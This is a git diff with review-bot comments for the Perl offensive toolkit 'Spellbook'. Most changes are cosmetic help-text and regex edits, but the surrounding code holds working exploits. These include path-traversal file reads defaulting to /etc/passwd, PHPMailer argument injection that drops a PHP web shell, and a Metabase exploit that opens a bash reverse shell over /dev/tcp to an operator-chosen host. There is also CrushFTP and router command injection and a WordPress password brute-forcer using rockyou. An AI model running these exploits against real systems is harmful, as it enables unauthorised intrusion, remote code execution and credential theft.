diff --git a/lib/Spellbook/Advisory/CVE_2006_3392.pm b/lib/Spellbook/Advisory/CVE_2006_3392.pm index 211e06a..90f5e12 100644 --- a/lib/Spellbook/Advisory/CVE_2006_3392.pm +++ b/lib/Spellbook/Advisory/CVE_2006_3392.pm @@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2006_3392 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $file); @@ -15,24 +15,27 @@ package Spellbook::Advisory::CVE_2006_3392 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $temp = "/..%01" x 40; my $request = $userAgent -> get($target . "/unauthenticated/" . $temp . $file); - - return $request -> content(); - } + + return $request -> content(); + } if ($help) { - return " - \rExploit::CVE_2006_3392 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-f, --file Define a file to read\n\n"; + return <<"EOT"; + +Exploit::CVE_2006_3392 +======================= +-h, --help See this menu +-t, --target Define a target +-f, --file Define a file to read + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2016_10045.pm b/lib/Spellbook/Advisory/CVE_2016_10045.pm index 6c7a61f..a53742f 100644 --- a/lib/Spellbook/Advisory/CVE_2016_10045.pm +++ b/lib/Spellbook/Advisory/CVE_2016_10045.pm @@ -7,7 +7,7 @@ package Spellbook::Advisory::CVE_2016_10045 { sub new { my ($self, $parameters) = @_; my ($help, $target, @results); - + my $dir = "/var/www/html/uploads"; my %shell = ( "name" => "spellbook_xpl.php", @@ -21,9 +21,9 @@ package Spellbook::Advisory::CVE_2016_10045 { "S|shell=s" => \$shell{name}, "d|directory=s" => \$dir ); - + if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } 
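Review bot: In the second CVE_2006_3392.pm hunk the scheme test `/^http(?:s)?:\/\//x` still groups a single character; `m{\Ahttps?://}` matches the same strings and needs no escaping. The same three-line normalisation is repeated in nearly every module this commit touches, with different default schemes (`https://` here, `http://` in CVE_2017_5487 and CVE_2020_9376). A shared helper that takes the target and the default scheme would keep those copies from drifting. The enclosing `new` starts outside the hunk.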
@@ -34,10 +34,10 @@ package Spellbook::Advisory::CVE_2016_10045 { $shell{code} = $code -> slurp(); } - + my $CVE_2016_10033 = "\"attacker\\\" -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; my $CVE_2016_10045 = "\"attacker\\' -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; - + try { my $request = $userAgent -> post($target, [ "action" => "send", @@ -62,13 +62,16 @@ package Spellbook::Advisory::CVE_2016_10045 { } if ($help) { - return " - \rExploit::CVE_2016_10045 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-S, --shell - \r-d, --directory \n\n"; + return<<"EOT"; + +Exploit::CVE_2016_10045 +======================= +-h, --help See this menu +-t, --target Define a target +-S, --shell +-d, --directory \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2017_5487.pm b/lib/Spellbook/Advisory/CVE_2017_5487.pm index c10b3eb..4d2f6f3 100755 --- a/lib/Spellbook/Advisory/CVE_2017_5487.pm +++ b/lib/Spellbook/Advisory/CVE_2017_5487.pm @@ -15,11 +15,11 @@ package Spellbook::Advisory::CVE_2017_5487 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get("$target/wp-json/wp/v2/users"); @@ -29,11 +29,11 @@ package Spellbook::Advisory::CVE_2017_5487 { foreach my $data (@$content) { my $username = $data -> {slug}; - + if ($username) { push @result, $username; } - } + } }; return @result; @@ -42,14 +42,17 @@ package Spellbook::Advisory::CVE_2017_5487 { } if ($help) { - return " - \rExploit::CVE_2017_5487 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CVE_2017_5487 +======================= +-h, --help See this menu +r-t, --target Define a target\n\n"; + +EOT } - return 0; + return 0; } } 
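Review bot: In the CVE_2016_10045.pm help hunk the old string's terminator was carried into the heredoc: the last body line is `-d, --directory \n\n";`, so the help text now ends with a literal `";` after the two interpolated newlines. The same residue is in nearly every other converted help block in this commit (CVE_2017_5487 also keeps a stray `r` in `r-t, --target`, and Mixed_Content and Pwn_DB end in `\n;`), while CVE_2006_3392 was converted cleanly and can serve as the model. The last body line should be just `-d, --directory`, followed by a blank line and `EOT`. A plain `<<"EOT"` also needs its terminator at column 0; indentation is not recoverable from this view, so confirm that, or use `<<~"EOT"` if the minimum supported Perl is 5.26 or later.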
diff --git a/lib/Spellbook/Advisory/CVE_2020_9376.pm b/lib/Spellbook/Advisory/CVE_2020_9376.pm index 2eb317d..a07175f 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9376.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9376.pm @@ -3,7 +3,7 @@ package Spellbook::Advisory::CVE_2020_9376 { use warnings; use Mojo::DOM; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -15,7 +15,7 @@ package Spellbook::Advisory::CVE_2020_9376 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -38,11 +38,14 @@ package Spellbook::Advisory::CVE_2020_9376 { } if ($help) { - return " - \rAdvisory::CVE_2020_9376 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target to exploit\n\n"; + return<<"EOT"; + +Advisory::CVE_2020_9376 +======================= +-h, --help See this menu +-t, --target Define a target to exploit\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2020_9377.pm b/lib/Spellbook/Advisory/CVE_2020_9377.pm index 5cac0b5..d5349b8 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9377.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9377.pm @@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2020_9377 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $cookie, $command, @results); @@ -16,13 +16,13 @@ package Spellbook::Advisory::CVE_2020_9377 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $payload = "cmd=$command"; - + my $headers = HTTP::Headers -> new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=$cookie" 
@@ -39,13 +39,16 @@ package Spellbook::Advisory::CVE_2020_9377 { } if ($help) { - return " - \rAdvisory::CVE_2020_9377 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-c, --cookie Define a session cookie - \r-p, --payload Set the command to run on the target\n\n"; + return<<"EOT"; + +Advisory::CVE_2020_9377 +======================= +-h, --help See this menu +-t, --target Define a target +-c, --cookie Define a session cookie +-p, --payload Set the command to run on the target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_24891.pm b/lib/Spellbook/Advisory/CVE_2021_24891.pm index ee0d49f..f3197ea 100644 --- a/lib/Spellbook/Advisory/CVE_2021_24891.pm +++ b/lib/Spellbook/Advisory/CVE_2021_24891.pm @@ -14,7 +14,7 @@ package Spellbook::Advisory::CVE_2021_24891 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -44,11 +44,14 @@ package Spellbook::Advisory::CVE_2021_24891 { } if ($help) { - return " - \rAdvisory::CVE_2021_24891 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Advisory::CVE_2021_24891 +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_41773.pm b/lib/Spellbook/Advisory/CVE_2021_41773.pm index 3bbae0d..1fe890a 100644 --- a/lib/Spellbook/Advisory/CVE_2021_41773.pm +++ b/lib/Spellbook/Advisory/CVE_2021_41773.pm @@ -16,10 +16,10 @@ package Spellbook::Advisory::CVE_2021_41773 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + if (!$file) { $file = "/etc/passwd"; } my $payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/"; 
@@ -34,7 +34,7 @@ package Spellbook::Advisory::CVE_2021_41773 { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get( - "https://" . $target . $payload, + "https://" . $target . $payload, Content => $command || " " ); @@ -44,13 +44,16 @@ package Spellbook::Advisory::CVE_2021_41773 { } if ($help) { - return " - \rExploit::CVE_2021_41773 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-f, --file Define a file to read - \r-c, --command Arbitrary code execution\n\n"; + return<<"EOT"; + +Exploit::CVE_2021_41773 +======================= +-h, --help See this menu +-t, --target Define a target +-f, --file Define a file to read +-c, --command Arbitrary code execution\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2023_29489.pm b/lib/Spellbook/Advisory/CVE_2023_29489.pm index 8f69a94..59e4b58 100644 --- a/lib/Spellbook/Advisory/CVE_2023_29489.pm +++ b/lib/Spellbook/Advisory/CVE_2023_29489.pm @@ -13,11 +13,11 @@ package Spellbook::Advisory::CVE_2023_29489 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my @payloads = ( @@ -39,14 +39,17 @@ package Spellbook::Advisory::CVE_2023_29489 { } if ($help) { - return " - \rExploit::CVE_2023_29489 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CVE_2023_29489 +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } - return 0; + return 0; } } diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm index 2660ce3..966b399 100644 --- a/lib/Spellbook/Advisory/CVE_2023_38646.pm +++ b/lib/Spellbook/Advisory/CVE_2023_38646.pm 
@@ -23,23 +23,23 @@ package Spellbook::Advisory::CVE_2023_38646 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); - my $request = $userAgent -> get("$target/api/session/properties"); + my $initial_request = $userAgent -> get("$target/api/session/properties"); - if ($request -> code() == 200) { + if ($initial_request -> code() == 200) { try { - my $content = decode_json($request -> content); + my $content = decode_json($initial_request -> content); my $token = $content -> {"setup-token"}; if ($token) { my $headers = HTTP::Headers -> new ("Content-Type" => "application/json"); my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", ""); - my $payload = qq({ + my $payload = { "token": "$token", "details": { "is_on_demand": false, @@ -57,10 +57,12 @@ package Spellbook::Advisory::CVE_2023_38646 { "name": "an-sec-research-team", "engine": "h2" } - }); + }; - my $request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); - my $response = $userAgent -> request($request); + my $json_payload = encode_json($payload); + + my $exploit_request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); + my $response = $userAgent -> request($exploit_request); if ($response -> code() == 400) { push @result, "\n[+] $target exploited\n"; 
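Review bot: The replacement for `qq({ ... })` in CVE_2023_38646.pm is not valid Perl: `my $payload = { "token": "$token", ... };` keeps JSON's `:` separators and the bareword `false`, so the module will not compile under `use strict`. The new `$json_payload` is also assigned and never read, because `HTTP::Request -> new(...)` is still passed `$payload`. Core::Module loads modules on demand, so a compile error here only surfaces when this module is selected; a `perl -c` pass over `lib/` in CI would catch it at commit time. Either restore the previous string form or finish the conversion and drop the unused variable. The enclosing `try` block continues outside the hunk.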
@@ -73,13 +75,16 @@ package Spellbook::Advisory::CVE_2023_38646 { } if ($help) { - return " - \rExploit::CVE_2023_38646 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-r, --remote Set the address to receive the reverse shell - \r-p, --port Set the port of reverse shell\n\n"; + return<<"EOT"; + +Exploit::CVE_2023_38646 +======================= +-h, --help See this menu +-t, --target Define a target +-r, --remote Set the address to receive the reverse shell +-p, --port Set the port of reverse shell\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2024_4040.pm b/lib/Spellbook/Advisory/CVE_2024_4040.pm index 336f0e4..c162fe7 100644 --- a/lib/Spellbook/Advisory/CVE_2024_4040.pm +++ b/lib/Spellbook/Advisory/CVE_2024_4040.pm @@ -17,18 +17,18 @@ package Spellbook::Advisory::CVE_2024_4040 { "payload=s" => \$payload, "help" => \$help ); - + if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $endpoint = "$target/WebInterface/"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $cookie_jar = HTTP::Cookies -> new(); - + $userAgent -> cookie_jar($cookie_jar); - + my $response = $userAgent -> post($endpoint); $cookie_jar -> extract_cookies($response); @@ -36,12 +36,12 @@ package Spellbook::Advisory::CVE_2024_4040 { my $cookies = $response -> header("Set-Cookie"); - if ($cookies =~ /currentAuth=([^;]+)/x) { - $response = $userAgent -> post($endpoint, - Content_Type => "application/x-www-form-urlencoded", + if ($cookies =~ /currentAuth=([^;]+)/x) { + $response = $userAgent -> post($endpoint, + Content_Type => "application/x-www-form-urlencoded", Content => "command=exists&paths=$payload&c2f=$1" ); - + push @result, $response -> decoded_content(); } 
@@ -49,12 +49,15 @@ package Spellbook::Advisory::CVE_2024_4040 { } if ($help) { - return " - \rAdvisory::CVE_2024_4040 - \r======================================== - \r-h, --help See this menu - \r-u, --target Define the targeted CrushFTP server URL - \r-p, --payload Set the payload to run on the target\n\n"; + return<<"EOT"; + +Advisory::CVE_2024_4040 +======================================== +-h, --help See this menu +-u, --target Define the targeted CrushFTP server URL +-p, --payload Set the payload to run on the target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm index 489c545..5d29c85 100644 --- a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm +++ b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm @@ -15,10 +15,10 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my @uuid = Spellbook::Helper::Generate_UUID -> new(["--version" => 4, "--repeat" => 1]); my $payload = "$target/_ignition/scripts/--%3E%3Csvg%20onload=alert%28$uuid[0]%29%3E"; my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -31,16 +31,19 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ) { push @results, $target; } - + return @results; } if ($help) { - return " - \rAdvisory::CVE_ - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Advisory::CVE_ +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Android/APKSign.pm b/lib/Spellbook/Android/APKSign.pm index 58745de..7250745 100755 --- a/lib/Spellbook/Android/APKSign.pm +++ b/lib/Spellbook/Android/APKSign.pm 
@@ -21,15 +21,18 @@ package Spellbook::Android::APKSign { } if ($help) { - return " - \rAndroid::APKSign - \r================ - \r-h, --help See this menu - \r-a, --apk Pass the APK file - \r-n, --name Set de package name - \r-p, --password Define a password\n"; + return<<"EOT"; + +Android::APKSign +================ +-h, --help See this menu +-a, --apk Pass the APK file +-n, --name Set de package name +-p, --password Define a password\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Android/Manifest.pm b/lib/Spellbook/Android/Manifest.pm index 065953f..57fc37f 100755 --- a/lib/Spellbook/Android/Manifest.pm +++ b/lib/Spellbook/Android/Manifest.pm @@ -27,21 +27,27 @@ package Spellbook::Android::Manifest { # Exported Android Components # Access to protected intents via exported Activities # Access to sensitive data via exported Activity - - return " - \r[ - ] -> Package name: $package - \r[ - ] -> Debug: $debug - \r[ - ] -> Backup: $backup\n\n"; + + return join("\n", + "[ - ] -> Package name: $package", + "[ - ] -> Debug: $debug", + "[ - ] -> Backup: $backup", + "", + "" + ); } if ($help) { - return " - \rAndroid::Manifest - \r============== - \r-h, --help See this menu - \r-f, --file Pass the AndroidManifest.xml file\n\n"; + return<<"EOT"; + +Android::Manifest +============== +-h, --help See this menu +-f, --file Pass the AndroidManifest.xml file\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Android/Strings.pm b/lib/Spellbook/Android/Strings.pm index 3bb0b51..79cf20d 100755 --- a/lib/Spellbook/Android/Strings.pm +++ b/lib/Spellbook/Android/Strings.pm @@ -12,17 +12,20 @@ package Spellbook::Android::Strings { # resources.arsc/strings.xml # res/xml/file_paths.xml - + # if (Dumper($data) =~ m/:\/\//) { # return "true"; # } } if ($help) { - return " - \rAndroid:: - \r================ - \r-h, --help See this menu\n"; + return<<"EOT"; + +Android:: +================ +-h, --help See this menu\n"; + +EOT } return 0; 
diff --git a/lib/Spellbook/Bruteforce/Facebook.pm b/lib/Spellbook/Bruteforce/Facebook.pm index 7f291ef..004034b 100644 --- a/lib/Spellbook/Bruteforce/Facebook.pm +++ b/lib/Spellbook/Bruteforce/Facebook.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Facebook { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::Facebook { } if ($help) { - return " - \rBruteforce::Facebook - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::Facebook +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Instagram.pm b/lib/Spellbook/Bruteforce/Instagram.pm index d1d5022..7f99fe3 100644 --- a/lib/Spellbook/Bruteforce/Instagram.pm +++ b/lib/Spellbook/Bruteforce/Instagram.pm @@ -18,15 +18,18 @@ package Spellbook::Bruteforce::Instagram { if ($username) { my $useragent = LWP::UserAgent -> new(); - } + } if ($help) { - return " - \rExploit::Brute_Force_Instagram - \r======================= - \r-h, --help See this menu - \r-u, --username Define a username - \r-f, --file Define a file to read\n\n"; + return<<"EOT"; + +Exploit::Brute_Force_Instagram +======================= +-h, --help See this menu +-u, --username Define a username +-f, --file Define a file to read\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Bruteforce/Linkedin.pm b/lib/Spellbook/Bruteforce/LinkedIn.pm similarity index 68% rename from lib/Spellbook/Bruteforce/Linkedin.pm rename to lib/Spellbook/Bruteforce/LinkedIn.pm index d59352d..8b6a8e7 100644 --- a/lib/Spellbook/Bruteforce/Linkedin.pm +++ b/lib/Spellbook/Bruteforce/LinkedIn.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::LinkedIn { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); 
@@ -18,11 +18,14 @@ package Spellbook::Bruteforce::LinkedIn { } if ($help) { - return " - \rBruteforce::LinkedIn - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::LinkedIn +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/SMTP.pm b/lib/Spellbook/Bruteforce/SMTP.pm index 727b096..d976736 100644 --- a/lib/Spellbook/Bruteforce/SMTP.pm +++ b/lib/Spellbook/Bruteforce/SMTP.pm @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::SMTP { } if ($help) { - return " - \rBruteforce::SMTP - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::SMTP +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Twitter.pm b/lib/Spellbook/Bruteforce/Twitter.pm index d094ea4..cd1b3ed 100644 --- a/lib/Spellbook/Bruteforce/Twitter.pm +++ b/lib/Spellbook/Bruteforce/Twitter.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Twitter { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::Twitter { } if ($help) { - return " - \rBruteforce::Twitter - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::Twitter +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Wordpress.pm b/lib/Spellbook/Bruteforce/Wordpress.pm index b204b07..f19689e 100644 --- a/lib/Spellbook/Bruteforce/Wordpress.pm +++ b/lib/Spellbook/Bruteforce/Wordpress.pm @@ -3,6 +3,7 @@ package Spellbook::Bruteforce::Wordpress { use warnings; use LWP::UserAgent; use HTTP::Request::Common; + use Carp qw(croak); # THIS IS A DRAFT MODULE 
@@ -18,28 +19,32 @@ package Spellbook::Bruteforce::Wordpress { ); if ($target) { - open(my $wordlist, "<", "./files/rockyou.txt"); + open(my $wordlist, "<", "./files/rockyou.txt") + or croak "Could not open wordlist file: $!"; + my @passwords = <$wordlist>; + close($wordlist) or croak "Could not close wordlist file: $!"; - while (<$wordlist>) { - chomp ($_); + chomp(@passwords); + foreach my $password (@passwords) { my $useragent = LWP::UserAgent->new; my $response = $useragent -> request(POST $target, [ log => $username, - pwd => $_, + pwd => $password, ]); if ($response -> is_success) { - print "Successfully logged in with password: $_ \n"; + print "Successfully logged in with password: $password \n"; + last; } } - - close($wordlist); } if ($help) { - return ""; + return<<"EOT"; + +EOT } return 0; diff --git a/lib/Spellbook/Core/Credentials.pm b/lib/Spellbook/Core/Credentials.pm index f12d6e8..309d19f 100644 --- a/lib/Spellbook/Core/Credentials.pm +++ b/lib/Spellbook/Core/Credentials.pm @@ -15,14 +15,14 @@ package Spellbook::Core::Credentials { "p|platform=s" => \$platform, "v|value=s" => \$value, ); - + if ($platform) { my $credentials = Mojo::File -> new(".config/credentials.json"); my $data = $credentials -> slurp(); my $content = decode_json($data); - if ($value) { + if ($value) { $content -> {$platform} = $value; $credentials -> spurt(encode_json($content)); } @@ -31,14 +31,17 @@ package Spellbook::Core::Credentials { } if ($help) { - return " - \rCore::Credentials - \r============== - \r-h, --help See this menu - \r-p, --platform Read some credentials filtering by platform - \r-v, --value Define a value of a platform\n\n"; + return<<"EOT"; + +Core::Credentials +============== +-h, --help See this menu +-p, --platform Read some credentials filtering by platform +-v, --value Define a value of a platform\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index f50f568..e77fe88 100644 
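Review bot: Core::Credentials writes secrets with `$credentials -> spurt(encode_json($content))` (context lines of the first Credentials.pm hunk), so a newly created `.config/credentials.json` gets whatever mode the process umask allows, and the path is resolved against the current working directory. Since the file holds API keys, I would restrict it after the write, e.g. `$credentials -> chmod(0600);`, and build the path from a fixed base directory. `spurt` is deprecated in recent Mojolicious releases in favour of `spew`, so check which version the project pins. `new` starts and ends outside the hunk.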
--- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -3,17 +3,18 @@ package Spellbook::Core::Helper { use warnings; sub new { - print " - \rSpellbook v0.3.6 - \rCore Commands - \r============== - \r\tCommand Description - \r\t------- ----------- - \r\t-s, --search List modules, you can filter by category - \r\t-m, --module Define a module to use - \r\t-h, --help To see help menu of a module\n\n"; - - return 1; + return<<"EOT"; + +Spellbook v0.3.6 +Core Commands +============== +Command Description +------- ----------- +-s, --search List modules, you can filter by category +-m, --module Define a module to use +-h, --help To see help menu of a module\n\n"; + +EOT } } diff --git a/lib/Spellbook/Core/Module.pm b/lib/Spellbook/Core/Module.pm index cb54b7e..82b3a7f 100644 --- a/lib/Spellbook/Core/Module.pm +++ b/lib/Spellbook/Core/Module.pm @@ -2,20 +2,31 @@ package Spellbook::Core::Module { use strict; use warnings; use Spellbook::Core::Resources; + use Carp qw(croak); sub new { my ($self, $module, @parameters) = @_; - my $resources = Spellbook::Core::Resources -> new(); + my $resources = Spellbook::Core::Resources->new(); - foreach my $package (@{$resources -> {modules}}) { - my $category = ucfirst $package -> {category}; - my $name = $category . "::" . $package -> {module}; + foreach my $package (@{$resources->{modules}}) { + my $category = ucfirst $package->{category}; + my $name = $category . "::" . $package->{module}; - if ($name eq $module) { - require "Spellbook/" . $category . "/" . $package -> {module} . ".pm"; + if ($name eq $module) { + my $module_path = "Spellbook::" . $category . "::" . $package->{module}; - my @run = "Spellbook::$name" -> new(@parameters); + my $success = eval { + require Module::Load; + Module::Load::load($module_path); + 1; + }; + + if (!$success || $@) { + croak "Failed to load module $module_path: $@"; + } + + my @run = $module_path->new(@parameters); my @results; foreach my $result (@run) { 
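Review bot: Core::Helper's `new` used to `print` the banner and `return 1`; it now returns the text instead, so a caller that relied on the side effect prints nothing and a caller that tested the return value receives a string rather than 1. The callers are not in this diff, so confirm they print what `new` returns. The heredoc also keeps the old terminator as literal text: its last line is `-h, --help To see help menu of a module\n\n";` and should end after `module`.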
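Review bot: `Module::Load::load($module_path)` in Core/Module.pm treats any argument containing characters other than word characters, `:` and `'` as a file path, so the name built from `$package->{category}` and `$package->{module}` should be validated first, for example `croak "Bad module name: $module_path" if $module_path !~ /\A\w+(?:::\w+)*\z/;`. The values come from Spellbook::Core::Resources, which is outside this diff, so this is defence in depth against an edited resource list rather than a demonstrated hole. Separately, `require Module::Load` inside the `eval` can become `use Module::Load ();` at the top of the package, and `!$success` alone is the reliable failure test. The loop body continues in the next hunk.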
@@ -27,7 +38,7 @@ package Spellbook::Core::Module { return @results; } } - + return "\n[!] Module not found.\n\n"; } } diff --git a/lib/Spellbook/Core/Orchestrator.pm b/lib/Spellbook/Core/Orchestrator.pm index b4a8a63..0c1c112 100644 --- a/lib/Spellbook/Core/Orchestrator.pm +++ b/lib/Spellbook/Core/Orchestrator.pm @@ -7,13 +7,13 @@ package Spellbook::Core::Orchestrator { use threads::shared; use Spellbook::Helper::Read_File; use List::MoreUtils qw(uniq); - + sub new { my ($self, $parameters) = @_; my ($help, $wordlist, $module, $list, $queue); my $threads = 10; - + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, @@ -34,24 +34,24 @@ package Spellbook::Core::Orchestrator { $queue -> end(); my @results :shared; - + async { while (defined(my $target = $queue -> dequeue())) { my @response = Spellbook::Core::Module -> new ( $module, [ "--target" => $target, @$parameters ] ); - + lock(@results); - + if (@response) { push @results, @response; } } - } - + } + for 1 .. $threads; - while (threads -> list(threads::running) > 0) { + while (threads -> list(threads::running) > 0) { $_ -> join() for threads -> list(threads::all); } @@ -59,13 +59,16 @@ package Spellbook::Core::Orchestrator { } if ($help) { - return " - \rCore::Orchestrator - \r============== - \r\t-h, --help See this menu - \r\t-t, --threads Number of threads - \r\t-w, --wordlist Wordlist file - \r\t-e, --entrypoint Module to execute\n\n"; + return<<"EOT"; + +Core::Orchestrator +============== +-h, --help See this menu +-t, --threads Number of threads +-w, --wordlist Wordlist file +-e, --entrypoint Module to execute\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/CORS_Misconfig.pm b/lib/Spellbook/Exploit/CORS_Misconfig.pm index 72fb36c..7dd342c 100644 --- a/lib/Spellbook/Exploit/CORS_Misconfig.pm +++ b/lib/Spellbook/Exploit/CORS_Misconfig.pm 
@@ -14,17 +14,17 @@ package Spellbook::Exploit::CORS_Misconfig { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $useragent = Spellbook::Core::UserAgent -> new (); my @payloads = ("*", "null", "https://spellbook.xpl", "$target.spellbook.xpl"); # "test.$target", "http://" foreach my $payload (@payloads) { my $request = $useragent -> get($target, "Origin" => $payload); my $header = $request -> header("access-control-allow-origin"); - + if ($header) { if ($header eq $payload) { push @results, $target; @@ -36,11 +36,14 @@ package Spellbook::Exploit::CORS_Misconfig { } if ($help) { - return " - \rExploit::CORS_Misconfing - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CORS_Misconfing +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/DataBreach.pm b/lib/Spellbook/Exploit/DataBreach.pm index c500fad..e68d700 100644 --- a/lib/Spellbook/Exploit/DataBreach.pm +++ b/lib/Spellbook/Exploit/DataBreach.pm @@ -4,7 +4,7 @@ package Spellbook::Exploit::DataBreach { use JSON; use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -20,7 +20,7 @@ package Spellbook::Exploit::DataBreach { my $endpoint = "https://haveibeenpwned.com/api/v3/breachedaccount/$target?includeUnverified=true&truncateResponse=false"; my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get($endpoint, "hibp-api-key" => $credentials); - + if ($request -> code() == 200) { my $data = decode_json($request -> decoded_content()); 
